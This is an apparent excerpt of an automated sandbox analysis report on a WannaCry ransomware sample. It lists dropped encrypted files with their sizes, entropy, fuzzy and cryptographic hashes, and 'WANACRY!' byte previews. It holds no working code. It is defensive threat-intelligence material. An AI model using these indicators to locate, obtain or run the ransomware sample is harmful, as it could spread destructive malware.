                                                                                      Preview:WANACRY!......',..>.V...1.k:g:../.-+@".P....E.m..L...DS...=.e....-._..+.C...as{..).VH.....=........7~....1..Y(....;.J.......HI.C...A..X.@....H.o..;..3.@(.....W.J|...c...@.M....qU...U.*.\........F/..\/......i.........gh...+.Hj..X..........76.*...z...EE.^7.t.....3.........y..`......!.u...B9Q.,?..:...u...N^.........T.O...&R7....F]...n.zX..2_.c>Y?..Ws.I...c.S.<z...^t...2.s..2._.$6$.N..K .~.t\.....J.......$_<........0@:....q....;.......0...},*...E......k.*_u....(.<...~L0DYW/..R.t.)....Ni.I....#X.j..`.r....U..........kL.~Pl...*.Cu.`.EZ....9..S...w....kfP.dK..9..dn....s.V..ih...J.6..C;.nQ..y..~.\.:..F..5...PiT^..|.....I.../.-5.}.....l.g..c|.>....Jp....a.....K[W..~.7E...g.....ZM..c..&.+{......../>&/#.2.:.....y....A......J....6.9G"j9...}.A...L..93{....Ua...~&....\...}0.Z..n=... ..}......P.n?:........<.vy:A+....:...?.....:....F,.L.x..'R...pv.h.E.!.MM..c"..&.w(...e...D....|....l.#Jy.4!,.;.....zV...r..X...W.Og.~........0`..,.J.A...db..H.....Gm
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):4120
                                                                                      Entropy (8bit):7.949438475685652
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:o0PNt7sBFt/9OSfIufyGw28DaMz59gle8Kp/UG21y1aCO4UJBhIv:bNmB/sSwBGw2x63g08Kp/U3y1VUJBg
                                                                                      MD5:AD4235258A2840BC9B15050BC39D2984
                                                                                      SHA1:F3116ABE1E86D90E1D9F206399A2C92C9028E089
                                                                                      SHA-256:8F110431FF05F40D5E991BCC16D2DD0E5F9FA429E86019B1701D3466A96C22F8
                                                                                      SHA-512:BB5F3E4AA71C7A649989A251EF8D1E4843FD9438B79CA5569F6BC70439BBD2F7D5DF649172B20452E780698C68DC14F2589C833F1383B9304534556710D770B9
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....`...0..l.......B...4..^.y.hU...k.k.....@]..mt.$X..V.T..m.9.H.G.d|.....4..>C..zW1.D.\.>.<.#.l.J.p.._v7.[....x..[.?....t.'jA...'...@7_jU...pI.F$vm.._OV1@.....+..=.....eu0...tm..;..X...o..e#. ..AJ..H._>.g.U.I.,._7v.8:.!3..p.&@......z...^A?.....(............/...A..<.9.I....."u..X..l.t1..b..=...i7d0H.r..ObR.6....|..9ORwh.......r........~...T4..2>.M_~"q......;...jx......Y.W....${`N9.a.K..O.}.....}.d...n..i ...#=]..3.p.&.....2.8.......TG.&9w.-{.._?..R..Q..8.Z.u.9K.d...p...`....0[...g..D..*.C-].*....i.Tw)...X..*"........^LC>u..Xp..[..,.e...Ub.p,{.....$5..x- 4T.A*.......LZ..6i..y...#$.U.J...g......2..o)F[.Cd8v...l^.x......(..^.....:U......9.....0.B..[..?.v.z.q..L..iw2.(.y>W.-8...GP.;-Cc...~.K.\......."N......x.,..k2z.i$_&Ucu.h.v.L....p....T].....OZ[...YS_...?b..F.4h.\ud.X.AQ.c.........<.;z5..P/.....C......~y.Za....Jrw?.Pq...._.C....r.5#......3.k..U.#y.'+.......ta .;..D.T.....c.....V}..qsx-.9...@...._./..s;.P.L....9w.."6.......Q..e
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):4120
                                                                                      Entropy (8bit):7.949438475685652
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:o0PNt7sBFt/9OSfIufyGw28DaMz59gle8Kp/UG21y1aCO4UJBhIv:bNmB/sSwBGw2x63g08Kp/U3y1VUJBg
                                                                                      MD5:AD4235258A2840BC9B15050BC39D2984
                                                                                      SHA1:F3116ABE1E86D90E1D9F206399A2C92C9028E089
                                                                                      SHA-256:8F110431FF05F40D5E991BCC16D2DD0E5F9FA429E86019B1701D3466A96C22F8
                                                                                      SHA-512:BB5F3E4AA71C7A649989A251EF8D1E4843FD9438B79CA5569F6BC70439BBD2F7D5DF649172B20452E780698C68DC14F2589C833F1383B9304534556710D770B9
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....`...0..l.......B...4..^.y.hU...k.k.....@]..mt.$X..V.T..m.9.H.G.d|.....4..>C..zW1.D.\.>.<.#.l.J.p.._v7.[....x..[.?....t.'jA...'...@7_jU...pI.F$vm.._OV1@.....+..=.....eu0...tm..;..X...o..e#. ..AJ..H._>.g.U.I.,._7v.8:.!3..p.&@......z...^A?.....(............/...A..<.9.I....."u..X..l.t1..b..=...i7d0H.r..ObR.6....|..9ORwh.......r........~...T4..2>.M_~"q......;...jx......Y.W....${`N9.a.K..O.}.....}.d...n..i ...#=]..3.p.&.....2.8.......TG.&9w.-{.._?..R..Q..8.Z.u.9K.d...p...`....0[...g..D..*.C-].*....i.Tw)...X..*"........^LC>u..Xp..[..,.e...Ub.p,{.....$5..x- 4T.A*.......LZ..6i..y...#$.U.J...g......2..o)F[.Cd8v...l^.x......(..^.....:U......9.....0.B..[..?.v.z.q..L..iw2.(.y>W.-8...GP.;-Cc...~.K.\......."N......x.,..k2z.i$_&Ucu.h.v.L....p....T].....OZ[...YS_...?b..F.4h.\ud.X.AQ.c.........<.;z5..P/.....C......~y.Za....Jrw?.Pq...._.C....r.5#......3.k..U.#y.'+.......ta .;..D.T.....c.....V}..qsx-.9...@...._./..s;.P.L....9w.."6.......Q..e
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):6056
                                                                                      Entropy (8bit):7.96474103983
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:o8+SH771MYqwIzNJT/HcdpiuNiIj0EqyVhNNK8asR8p0nKGg+LVsBizW1u3p+Sv2:06P1MYTIfbtNK8lGdLV0ipMa7C
                                                                                      MD5:B3109B6CC29E610B12D17B2B9C6EB69D
                                                                                      SHA1:D22634B7BD5FCA59818CA210147BAA9EEEA662ED
                                                                                      SHA-256:4558883A95BCAAEB4BA5CC478E6F3ADC76F0ABE89F4E60DE22FDB814963E4D7D
                                                                                      SHA-512:E29E53DEDA0C3B6EA8FF3B4039F14B8E3992C9C0211AADF4588AD119774358912E32DC8FF5D69AEAC109E5CDEF359016FE90C17EFF64DDBBE8DA15B57D2A7DE4
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......w........)e.%%....4=3...S...C.,....{...rh_v.&.P...F=Q...,.,....f......c"..ER.............F.B.7.Cna\.7.w.<G.ou...Q.C...z....w.#...b.Z.0Q..-.9.J.Z2......H...I......u.C4...!P4..F....|.i.~7;h..R*.........._.$...Ea....."........J(..|.h...:3..[......(.............baF.OM......!=.^c.P.W:.8.Wx..."...91e...:,.7..#.....2.Y.S.7>.B.D.Q.9\k...lk7M.......K>.}..z^.b.+...G....u...6MT.3L..U..a..BE..v..?..6I....On..P.=.V.b.\..%.Y.^{+..E....................."....I.@.m... N....."+#.8.....>.%1..k .t*..././.....>...*wLi....7..$G.....M.87P.@....EU.2....\Z>....v..d....?...e.e.\.k....i...k......wr.....F.}.5...o..X..>...R....W...r.+.n,m.Z.....d.Ae6.S#../...Z&.V.CP...p~.|.:7E^N..m##.#..%....J.........M..C....^\M.@m.....~..3.)..i...........].....M....h.@...RJ....c.._2$.......hR..{.r.n.(..6....tY....-........#b>.N..B...r....4..s....E*ynD.\;...oj...U.J.-.4.p...!.2<......#v.X.'|.G..l"[`TBZ.9..9.>]~..H6.j~.....v@.6.{m.Z..h...f#..x....F ..ah.]....{)...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):6056
                                                                                      Entropy (8bit):7.96474103983
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:o8+SH771MYqwIzNJT/HcdpiuNiIj0EqyVhNNK8asR8p0nKGg+LVsBizW1u3p+Sv2:06P1MYTIfbtNK8lGdLV0ipMa7C
                                                                                      MD5:B3109B6CC29E610B12D17B2B9C6EB69D
                                                                                      SHA1:D22634B7BD5FCA59818CA210147BAA9EEEA662ED
                                                                                      SHA-256:4558883A95BCAAEB4BA5CC478E6F3ADC76F0ABE89F4E60DE22FDB814963E4D7D
                                                                                      SHA-512:E29E53DEDA0C3B6EA8FF3B4039F14B8E3992C9C0211AADF4588AD119774358912E32DC8FF5D69AEAC109E5CDEF359016FE90C17EFF64DDBBE8DA15B57D2A7DE4
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......w........)e.%%....4=3...S...C.,....{...rh_v.&.P...F=Q...,.,....f......c"..ER.............F.B.7.Cna\.7.w.<G.ou...Q.C...z....w.#...b.Z.0Q..-.9.J.Z2......H...I......u.C4...!P4..F....|.i.~7;h..R*.........._.$...Ea....."........J(..|.h...:3..[......(.............baF.OM......!=.^c.P.W:.8.Wx..."...91e...:,.7..#.....2.Y.S.7>.B.D.Q.9\k...lk7M.......K>.}..z^.b.+...G....u...6MT.3L..U..a..BE..v..?..6I....On..P.=.V.b.\..%.Y.^{+..E....................."....I.@.m... N....."+#.8.....>.%1..k .t*..././.....>...*wLi....7..$G.....M.87P.@....EU.2....\Z>....v..d....?...e.e.\.k....i...k......wr.....F.}.5...o..X..>...R....W...r.+.n,m.Z.....d.Ae6.S#../...Z&.V.CP...p~.|.:7E^N..m##.#..%....J.........M..C....^\M.@m.....~..3.)..i...........].....M....h.@...RJ....c.._2$.......hR..{.r.n.(..6....tY....-........#b>.N..B...r....4..s....E*ynD.\;...oj...U.J.-.4.p...!.2<......#v.X.'|.G..l"[`TBZ.9..9.>]~..H6.j~.....v@.6.{m.Z..h...f#..x....F ..ah.]....{)...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):10344
                                                                                      Entropy (8bit):7.983383154065749
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:TFu6h7yEaQF7ZgyF5zodhdqc7GVytdBL6eOhTw6PcHGtRmkbBFfFRavmY5cpG:jBtaQ9Zg7dWhozNOhk60HGf7bDfWOY5V
                                                                                      MD5:BFD99E74F827E37603C59ABCD546EDAF
                                                                                      SHA1:3BA08BA5C84743F811A975AEC8DE1905F997FF0B
                                                                                      SHA-256:E16C356DFB8D22EDA7F4B1185044AA9699EB15D12464F1F59E7DAC9F6E3158B9
                                                                                      SHA-512:40FA66D521F5F83C155DE5CE9AC6A8288BD56029CF7D5DF3137B29194A5200A11EDD94DCBDB3075C68FDB72D2418E067BB1DD2487C7F2B53D9AD9CA5C01C1A42
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....9)9... .y.....Y..0......6.92-E..x.I`...L|*...%..i.r[.%^.C.......E...g.'v*.6.V...ur'z..t.'L...M.5..W.o..d.!...n...w..g...|i.pa8i....x5....:..+:.^.%...z.S0..3t..;.t.Z.T.j.!...uP.o...Xd..$.$D;=.......7._s.ft.;...N'...........V..sso..b.C.8hf}...%..SM.F.F....P'............>A.}kTBj2.j..?...G.<..q.B.br.g....../)...$..c.S..Wo.}...Z..K. .gsM..1....d...K.!63..$a.k.M.?}......k].Q.!.A~..:...[.9O0..A......=...a}T.l.../...6..:..!.....<*...._$.x....F.~7?..S..k.].7...BC..&.f......4.......]...........C....nG..`v..........v.?T....5...[a.U...a\..5.A.nd.B.i..@5.....A$w..|.gXzpT!.B.*v...H..-.G..2."..=m\.p...=3....zgb.o.>.z..;.t#l.mz..<{..H...|...1uXNz..@..@.\Q[.#..X.....6P...o...sE./k\D%...p|..#(i.`................h..zL..K..,0.EU......&......B.9G.....r..o...4..$$(;.{.).. ... ......`.+..|-.....P..{..|7...}.0..u..:$.?.....v\.....:..?.b.wi....|...8...G.p...V..y....^.'.....B=T<.>O.V...._.1..j...o~....Fb.)....\Po.....eX.h..7R.......I...'.q..>.....*v?.D1.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):10344
                                                                                      Entropy (8bit):7.983383154065749
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:TFu6h7yEaQF7ZgyF5zodhdqc7GVytdBL6eOhTw6PcHGtRmkbBFfFRavmY5cpG:jBtaQ9Zg7dWhozNOhk60HGf7bDfWOY5V
                                                                                      MD5:BFD99E74F827E37603C59ABCD546EDAF
                                                                                      SHA1:3BA08BA5C84743F811A975AEC8DE1905F997FF0B
                                                                                      SHA-256:E16C356DFB8D22EDA7F4B1185044AA9699EB15D12464F1F59E7DAC9F6E3158B9
                                                                                      SHA-512:40FA66D521F5F83C155DE5CE9AC6A8288BD56029CF7D5DF3137B29194A5200A11EDD94DCBDB3075C68FDB72D2418E067BB1DD2487C7F2B53D9AD9CA5C01C1A42
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....9)9... .y.....Y..0......6.92-E..x.I`...L|*...%..i.r[.%^.C.......E...g.'v*.6.V...ur'z..t.'L...M.5..W.o..d.!...n...w..g...|i.pa8i....x5....:..+:.^.%...z.S0..3t..;.t.Z.T.j.!...uP.o...Xd..$.$D;=.......7._s.ft.;...N'...........V..sso..b.C.8hf}...%..SM.F.F....P'............>A.}kTBj2.j..?...G.<..q.B.br.g....../)...$..c.S..Wo.}...Z..K. .gsM..1....d...K.!63..$a.k.M.?}......k].Q.!.A~..:...[.9O0..A......=...a}T.l.../...6..:..!.....<*...._$.x....F.~7?..S..k.].7...BC..&.f......4.......]...........C....nG..`v..........v.?T....5...[a.U...a\..5.A.nd.B.i..@5.....A$w..|.gXzpT!.B.*v...H..-.G..2."..=m\.p...=3....zgb.o.>.z..;.t#l.mz..<{..H...|...1uXNz..@..@.\Q[.#..X.....6P...o...sE./k\D%...p|..#(i.`................h..zL..K..,0.EU......&......B.9G.....r..o...4..$$(;.{.).. ... ......`.+..|-.....P..{..|7...}.0..u..:$.?.....v\.....:..?.b.wi....|...8...G.p...V..y....^.'.....B=T<.>O.V...._.1..j...o~....Fb.)....\Po.....eX.h..7R.......I...'.q..>.....*v?.D1.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):7240
                                                                                      Entropy (8bit):7.979150391498734
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:f1Ze5s/BtC8/PEscj9TchsxD5poBUbkzF:fC5s/Bsd3RTx5pyB
                                                                                      MD5:AD8092F66EFAEB6DF06469B58337C538
                                                                                      SHA1:5575962B62ACB622245B9BA5842ADBD5AD2E84BE
                                                                                      SHA-256:21E09478888F43965585965BA48EB7E9F3B1741D8EA4B1A502A9EEB1D8D4B656
                                                                                      SHA-512:EB278A02EB20507A68660F1F94BA8A344929884183FE4E2362C2B2B23EDEB654EE66E52712F58C36F0DB967149C6A57CBA1C8E6D9D1ED8A485C9F4F81E97FF2F
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....RE]+.zh`J...\.>EEW.^..j".;yE.q<....g.. ....B....4M~t.....o.`...vN`7...)R.%......7l.\...i.OT.......U...[...K...&...8...&|...u0.c..a9.)b.L..........Y...K.i.n.h.C..$.-..!..t...Q.]..%.[w..r>.`..1W.w.8.OA.M...."...q..R*g..45.WC=...R.n../F.7}..V"7..ugE....+.......zt.?L'....e}.b<-.W........).%..e.F.....y$..).`...0.9'....]..s.oN....d.k...C..r5....4.."..%....:=....x.....U'.)pc~u}...XGI;2O...6K..>!.x#RT..U../..2..z.Kf}OC.v>8do......G.....<........+WkN.....vE..G;...T..~....{.?m).....z.^q..M.....D...z..LQiw.a.N........F.....j.........e(-,I....,..4I...J.......$.];...(...as..m......\B.......mH.7=..v..k..t....U.1.nT._.E..l...VkG..HP..?........w.:.+.|$I..7j$....u....|.. b..KP.VH..ST..}h4.v}.U..{.r..u.y....H.N.C`...<.B[y.a.0.Z4.....a....i..Lt.,..W.0`..?.f...J....V...g..-a=.....|...(*.....c.V'.#0].v..2.*E..e....#.{c....DH<;...~..W.._....$c/t.c9./..V.....s.pX{_?.....Y..#A...2)..Y..J....?.o.T.e'^E......XZR.........9.D\...;.V.vM.....s:U.&..?a.e]..Y
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):7240
                                                                                      Entropy (8bit):7.979150391498734
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:f1Ze5s/BtC8/PEscj9TchsxD5poBUbkzF:fC5s/Bsd3RTx5pyB
                                                                                      MD5:AD8092F66EFAEB6DF06469B58337C538
                                                                                      SHA1:5575962B62ACB622245B9BA5842ADBD5AD2E84BE
                                                                                      SHA-256:21E09478888F43965585965BA48EB7E9F3B1741D8EA4B1A502A9EEB1D8D4B656
                                                                                      SHA-512:EB278A02EB20507A68660F1F94BA8A344929884183FE4E2362C2B2B23EDEB654EE66E52712F58C36F0DB967149C6A57CBA1C8E6D9D1ED8A485C9F4F81E97FF2F
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....RE]+.zh`J...\.>EEW.^..j".;yE.q<....g.. ....B....4M~t.....o.`...vN`7...)R.%......7l.\...i.OT.......U...[...K...&...8...&|...u0.c..a9.)b.L..........Y...K.i.n.h.C..$.-..!..t...Q.]..%.[w..r>.`..1W.w.8.OA.M...."...q..R*g..45.WC=...R.n../F.7}..V"7..ugE....+.......zt.?L'....e}.b<-.W........).%..e.F.....y$..).`...0.9'....]..s.oN....d.k...C..r5....4.."..%....:=....x.....U'.)pc~u}...XGI;2O...6K..>!.x#RT..U../..2..z.Kf}OC.v>8do......G.....<........+WkN.....vE..G;...T..~....{.?m).....z.^q..M.....D...z..LQiw.a.N........F.....j.........e(-,I....,..4I...J.......$.];...(...as..m......\B.......mH.7=..v..k..t....U.1.nT._.E..l...VkG..HP..?........w.:.+.|$I..7j$....u....|.. b..KP.VH..ST..}h4.v}.U..{.r..u.y....H.N.C`...<.B[y.a.0.Z4.....a....i..Lt.,..W.0`..?.f...J....V...g..-a=.....|...(*.....c.V'.#0].v..2.*E..e....#.{c....DH<;...~..W.._....$c/t.c9./..V.....s.pX{_?.....Y..#A...2)..Y..J....?.o.T.e'^E......XZR.........9.D\...;.V.vM.....s:U.&..?a.e]..Y
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):25624
                                                                                      Entropy (8bit):7.992152243303173
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:Q234BGONLPzcwsFHixvMyRU6rnaq2Q9ob:Q2oBNNbzcNqvrYt
                                                                                      MD5:058EA22F66CF5C47F545D0BB530DC3F1
                                                                                      SHA1:9DDECA62B530E49D218F8A1595277116FE830207
                                                                                      SHA-256:A1109EBB9D5DC276C2706E01FA1032190BAC201DC486A81FFDE70D7821941A6C
                                                                                      SHA-512:72ED8BB4AECDE58DE77896B506404F2FD7B97F8EDDE67B68CBD26FDD5E97001DC594379ADBC5637F023EA6DC22218A67CF3860C3747962AAF08887FECE3CA785
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....m..4=3+<.a..;.\.....j.g...M.5|6}...lim`.SO$.z.P=|...t..ST.Y......i=.^jM.^.X.q...>m4.t.l.....`..gs.._.Nf... 4....&b\.0..u.....<7.$s......?L.\0.u.....?.!.....w......\...$....t.......Z...."+....c.......g.(...P.0Y.P.b8/...........o?r.~)p./I.x.....b.......r.X...5u..A3mK.....J.o&$..zS....."e[XD.Qo...kX8.3;...MX.ysI..8.y...'`1>@...c.B\..(.uCJ=..b........ ................f...m"pHh....9.%...B~.4.7$gW.7.... ...h<.~)...c..5...!........p8..u7"J(...#...1.T.gI.Y......E...B...d...z..6S......).H.z..R......A.?.A..Y.2>\P.*.D.V..N.....g.fv..C.g...M..*.S?e;D.......L..6&..!........J.r..z....&...#...J..%..j........I..|t......I.$...4/5....o..`.6.5.r{...gf/.6..=f.7..8!...<....-..6*.P...)...=B..R...."...M...-...V:t...-.r.X.....`...\..o.7..bra..]"....V..K..G..Vz....O.ou.v..'..D`..t.K@.R[U...*...0.;.,+s.T.R..v .jD.....tt._........,....)..:.U!.i.#..8q..e.N.|V.j1.t.X....bE.-.Q$.....9S...t....V..`..r....f5.99..=....;s....i.cM...["..}.&.Qt.'..........\F
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):25624
                                                                                      Entropy (8bit):7.992152243303173
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:Q234BGONLPzcwsFHixvMyRU6rnaq2Q9ob:Q2oBNNbzcNqvrYt
                                                                                      MD5:058EA22F66CF5C47F545D0BB530DC3F1
                                                                                      SHA1:9DDECA62B530E49D218F8A1595277116FE830207
                                                                                      SHA-256:A1109EBB9D5DC276C2706E01FA1032190BAC201DC486A81FFDE70D7821941A6C
                                                                                      SHA-512:72ED8BB4AECDE58DE77896B506404F2FD7B97F8EDDE67B68CBD26FDD5E97001DC594379ADBC5637F023EA6DC22218A67CF3860C3747962AAF08887FECE3CA785
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....m..4=3+<.a..;.\.....j.g...M.5|6}...lim`.SO$.z.P=|...t..ST.Y......i=.^jM.^.X.q...>m4.t.l.....`..gs.._.Nf... 4....&b\.0..u.....<7.$s......?L.\0.u.....?.!.....w......\...$....t.......Z...."+....c.......g.(...P.0Y.P.b8/...........o?r.~)p./I.x.....b.......r.X...5u..A3mK.....J.o&$..zS....."e[XD.Qo...kX8.3;...MX.ysI..8.y...'`1>@...c.B\..(.uCJ=..b........ ................f...m"pHh....9.%...B~.4.7$gW.7.... ...h<.~)...c..5...!........p8..u7"J(...#...1.T.gI.Y......E...B...d...z..6S......).H.z..R......A.?.A..Y.2>\P.*.D.V..N.....g.fv..C.g...M..*.S?e;D.......L..6&..!........J.r..z....&...#...J..%..j........I..|t......I.$...4/5....o..`.6.5.r{...gf/.6..=f.7..8!...<....-..6*.P...)...=B..R...."...M...-...V:t...-.r.X.....`...\..o.7..bra..]"....V..K..G..Vz....O.ou.v..'..D`..t.K@.R[U...*...0.;.,+s.T.R..v .jD.....tt._........,....)..:.U!.i.#..8q..e.N.|V.j1.t.X....bE.-.Q$.....9S...t....V..`..r....f5.99..=....;s....i.cM...["..}.&.Qt.'..........\F
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1784
                                                                                      Entropy (8bit):7.882597826734308
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkeupdXWB/AQi5IrIhrrCG960IoWLb9KXWUBBfSqFYOAwmgtohUVf+PWZ2Hlq7cg:bk1XWH6s+qmIog98lbSq+8L9eIcw
                                                                                      MD5:1AAAE79B90C4ED44DE8D6AC1E2D698B4
                                                                                      SHA1:4FA394A29809AB839EF1B515B29B8B4D85FD5F72
                                                                                      SHA-256:DBAA9CA9474E99786DFF9C72EE492194E3875AEEEF2BBE2DD0C0F0408CD3BB70
                                                                                      SHA-512:EEF1040A2C2F237DFDCF3952AF23857328EFF095AA2BB09EFFFBB158F26C84E3016801B01ABCFAF386FC83BAAD93EC389154FDE2148C648B836C138D6C35085B
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....t..%.x.,.....p.;......8(.......+.#..D...5...<..J......r?d.-...s.j|..D].r..)JHE...n{8>.ZY..r..T.2].I..........&..d.}...Y...Gv..*.Y...;.@...7L....uA...O.2..C.......c......Z..7z..................TU.....m...l.......M%..u.T.%. **...7.Y.)..R...................@...v.......!.0v..O@C;..d............b..H.ek..qN...6..t8...A..............:..!f.J.r..D...u..U.....Dl....]q;J..:.P........E...<.....=..}%.U....Q...(....y.a.F...e2...Wak.\...Vhzk.3...p..&.%q.Zje...J.8..WJ.3H.~@....Q....q.........^.4.e.7...9...c...4.0i.\.$....\.kU}G.....^......2..^At.x.&H6..q'oxL..[l.F./>..=.....U....`..'..G..W....D."......`...~.k.H.$\.. F)=...,...O..a...m...l#6......./....G.j...E<.....RZ.Y...U...JVh.X...v....h.6....F...%.[...m......5...BCN.?...<....k..F9.....@.9....E.e.iX..q...^P.._...{h.G...0.Z{%.].;.."f.Y.N..W..(0....'.c....V....,..2Ig..hq..g..[.M...t...m.i.B.}>D.1..=..C.0X..q.:AUB.V...h...j....w.u.k}..W.q...L.=.U...F.fs/c}..4.VB?..Zu.-WX.K...Q)....(...X.........~..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1784
                                                                                      Entropy (8bit):7.882597826734308
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkeupdXWB/AQi5IrIhrrCG960IoWLb9KXWUBBfSqFYOAwmgtohUVf+PWZ2Hlq7cg:bk1XWH6s+qmIog98lbSq+8L9eIcw
                                                                                      MD5:1AAAE79B90C4ED44DE8D6AC1E2D698B4
                                                                                      SHA1:4FA394A29809AB839EF1B515B29B8B4D85FD5F72
                                                                                      SHA-256:DBAA9CA9474E99786DFF9C72EE492194E3875AEEEF2BBE2DD0C0F0408CD3BB70
                                                                                      SHA-512:EEF1040A2C2F237DFDCF3952AF23857328EFF095AA2BB09EFFFBB158F26C84E3016801B01ABCFAF386FC83BAAD93EC389154FDE2148C648B836C138D6C35085B
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....t..%.x.,.....p.;......8(.......+.#..D...5...<..J......r?d.-...s.j|..D].r..)JHE...n{8>.ZY..r..T.2].I..........&..d.}...Y...Gv..*.Y...;.@...7L....uA...O.2..C.......c......Z..7z..................TU.....m...l.......M%..u.T.%. **...7.Y.)..R...................@...v.......!.0v..O@C;..d............b..H.ek..qN...6..t8...A..............:..!f.J.r..D...u..U.....Dl....]q;J..:.P........E...<.....=..}%.U....Q...(....y.a.F...e2...Wak.\...Vhzk.3...p..&.%q.Zje...J.8..WJ.3H.~@....Q....q.........^.4.e.7...9...c...4.0i.\.$....\.kU}G.....^......2..^At.x.&H6..q'oxL..[l.F./>..=.....U....`..'..G..W....D."......`...~.k.H.$\.. F)=...,...O..a...m...l#6......./....G.j...E<.....RZ.Y...U...JVh.X...v....h.6....F...%.[...m......5...BCN.?...<....k..F9.....@.9....E.e.iX..q...^P.._...{h.G...0.Z{%.].;.."f.Y.N..W..(0....'.c....V....,..2Ig..hq..g..[.M...t...m.i.B.}>D.1..=..C.0X..q.:AUB.V...h...j....w.u.k}..W.q...L.=.U...F.fs/c}..4.VB?..Zu.-WX.K...Q)....(...X.........~..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2696
                                                                                      Entropy (8bit):7.932345232932748
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkw7U2aBUOWMSJ9RcuZupFWzux9fybbY4FTTx2d0t2dWRpGnPibkufEAE/KzgFt:o0U3UOuvRcuZQWyx1yb9TTsZnqbfQL
                                                                                      MD5:9F5E8F74F3A9088711205286FD6DEE5E
                                                                                      SHA1:44B6F9B24D2DF2C3D3B15D21ABB5E9D0BC7C62FB
                                                                                      SHA-256:65F81970B199244932394FA5D2FD1135CA3C4C74A00D32BBE143CC8DD9948F3B
                                                                                      SHA-512:FBCFC5CE36AD8CB16A62FC266906827DA2ACFF6FB85E8AADD3DEE10E6253DBE9165C88E5EECE3F5F1A69994B9813F6858CB520974586F8747DA99834E89B0BCD
                                                                                      Malicious:false
                                                                                      Reputation:low
